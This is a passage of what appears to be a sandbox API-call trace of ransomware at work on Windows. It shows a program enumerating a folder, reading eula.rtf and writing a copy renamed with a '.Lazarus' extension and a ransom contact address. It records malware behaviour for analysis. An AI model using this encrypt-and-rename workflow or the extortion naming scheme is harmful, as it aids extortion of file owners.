"c:\\588bce7c90097ed212\\1044"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.974] GetLastError () returned 0x5 [0068.974] GetLastError () returned 0x5 [0068.974] SetLastError (dwErrCode=0x5) [0068.974] GetLastError () returned 0x5 [0068.974] SetLastError (dwErrCode=0x5) [0068.974] GetLastError () returned 0x5 [0068.974] SetLastError (dwErrCode=0x5) [0068.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78450 | out: hHeap=0x20000) returned 1 [0068.974] AreFileApisANSI () returned 1 [0068.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0068.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78310 [0068.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78310, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044") returned 27 [0068.974] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044" (normalized: "c:\\588bce7c90097ed212\\1044"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.974] GetLastError () returned 0x5 [0068.974] GetLastError () returned 0x5 [0068.974] SetLastError (dwErrCode=0x5) [0068.974] GetLastError () returned 0x5 [0068.974] SetLastError (dwErrCode=0x5) [0068.974] GetLastError () returned 0x5 [0068.975] SetLastError (dwErrCode=0x5) [0068.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78310 | out: hHeap=0x20000) returned 1 [0068.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0068.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0068.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.975] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.975] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.975] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.975] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0068.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0068.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0068.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0068.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0068.975] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1045", cAlternateFileName="")) returned 1 [0068.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0068.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0068.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0068.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0068.975] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78150 [0068.975] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.975] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0068.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0068.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0068.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0068.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0068.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0068.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e18 [0068.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0068.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0068.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0068.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0068.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0068.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0068.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71b68 [0068.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0068.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0068.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0068.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0068.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0068.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.976] AreFileApisANSI () returned 1 [0068.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1044\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1044\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0068.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0068.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0068.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0068.977] AreFileApisANSI () returned 1 [0068.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0068.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 36 [0068.977] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.977] GetFileType (hFile=0x420) returned 0x1 [0068.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0068.977] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0068.977] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0068.977] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0068.978] CloseHandle (hObject=0x420) returned 1 [0068.978] AreFileApisANSI () returned 1 [0068.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0068.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 36 [0068.978] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.978] GetFileType (hFile=0x420) returned 0x1 [0068.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0068.978] CloseHandle (hObject=0x420) returned 1 [0068.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0068.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0068.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0068.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0068.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0068.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0068.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0068.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0068.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0068.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0068.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0068.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0068.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0068.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0068.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0068.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.979] AreFileApisANSI () returned 1 [0068.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0068.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 36 [0068.979] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbe6)) returned 1 [0068.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0068.979] AreFileApisANSI () returned 1 [0068.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0068.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0068.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0068.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0068.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0068.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0068.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.980] GetLastError () returned 0x0 [0068.980] SetLastError (dwErrCode=0x0) [0068.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4ddc8 [0068.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0068.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c288 [0068.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d7b0 [0068.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0068.980] GetLastError () returned 0x0 [0068.980] SetLastError (dwErrCode=0x0) [0068.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0068.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0068.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68f40 [0068.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0068.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76020 [0068.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0068.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0068.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0068.980] AreFileApisANSI () returned 1 [0068.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0068.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0068.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0068.981] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.982] GetFileType (hFile=0x420) returned 0x1 [0068.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0068.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0068.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0068.983] AreFileApisANSI () returned 1 [0068.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69210 [0068.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 36 [0068.983] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.983] GetFileType (hFile=0x410) returned 0x1 [0068.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0068.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a430 [0068.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0068.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.983] GetLastError () returned 0x0 [0068.983] SetLastError (dwErrCode=0x0) [0068.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.983] GetLastError () returned 0x0 [0068.984] SetLastError (dwErrCode=0x0) [0068.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0068.984] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f030*=0xbe6, lpOverlapped=0x0) returned 1 [0068.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0068.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0068.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0068.986] GetLastError () returned 0x0 [0068.986] SetLastError (dwErrCode=0x0) [0068.986] GetLastError () returned 0x0 [0068.986] SetLastError (dwErrCode=0x0) [0068.986] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0068.986] GetLastError () returned 0x0 [0068.986] SetLastError (dwErrCode=0x0) [0068.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7cfa0 [0068.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4f8 [0068.986] GetLastError () returned 0x0 [0068.986] SetLastError (dwErrCode=0x0) [0068.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0068.986] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xbf0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0xbf0, lpOverlapped=0x0) returned 1 [0068.987] GetLastError () returned 0x0 [0068.987] SetLastError (dwErrCode=0x0) [0068.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0068.987] GetLastError () returned 0x0 [0068.987] SetLastError (dwErrCode=0x0) [0068.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0068.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4f8 | out: hHeap=0x20000) returned 1 [0068.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0068.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0068.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0068.988] CloseHandle (hObject=0x420) returned 1 [0068.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0068.989] CloseHandle (hObject=0x410) returned 1 [0068.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0068.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0068.989] AreFileApisANSI () returned 1 [0068.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.989] 